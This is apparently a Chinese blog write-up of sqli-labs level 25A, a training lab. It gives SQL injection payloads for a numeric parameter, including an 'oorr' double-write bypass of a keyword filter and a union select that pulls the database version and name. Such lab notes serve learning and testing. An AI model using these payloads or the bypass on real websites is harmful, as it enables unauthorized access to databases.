sqllab第二十五A关通关笔记

知识点:

  • 数值型注入
  • 双写绕过
    • oorr
    • anand
  • 这里不能用错误注入(固定错误回显信息)
  • 联合注入

测试发现跟25关好像一样,就是过滤了and or # 等东西

构造payload:id=1/0

发现成功运算了,这是一个数值型的注入

构造payload:id=1/0+oorr+1=1--+

成功显示了内容,可以尝试错误注入

构造payload:id=1/0+oorr+exp(710)=1--+

发现没有任何的回显信息,说明这里不能用错误注入

老方法,使用联合注入

构造payload:id=1/0+union+select+1,2,3+--+

成功回显了输入的内容

下面开始进行数据库名和版本的获取

构造payload:id=1/0+union+select+1,version(),database()+--+

成功获取了版本信息和数据库名

同理,可以获取数据库其他内容,这里不演示了,收工

10

相关推荐
星轨初途16 分钟前
类和对象(中):六大默认成员函数与运算符重载全解析
开发语言·c++·经验分享·笔记·ajax·servlet
似水明俊德26 分钟前
13-C#.Net-设计模式六大原则-学习笔记
笔记·学习·设计模式·c#·.net
Flittly27 分钟前
【从零手写 ClaudeCode:learn-claude-code 项目实战笔记】(11)Autonomous Agents (自治智能体)
笔记·python·ai·ai编程
今儿敲了吗32 分钟前
python基础学习笔记第八章——异常
笔记·python·学习
朱一头zcy39 分钟前
Linux系列04:简单理解inode、硬链接、软链接、挂载的概念
linux·笔记
L1624761 小时前
Nginx+Keepalived 高可用集群实战笔记
运维·笔记·nginx
_李小白1 小时前
【OSG学习笔记】Day 3: OSG 实用工具
笔记·图形渲染
Java面试题总结2 小时前
新人笔记之模板方法模式
java·笔记·模板方法模式
日更嵌入式的打工仔2 小时前
CIA 402笔记
笔记
努力的lpp2 小时前
【2024小迪安全】第6天:抓包技术 — 结构化复习笔记
笔记·安全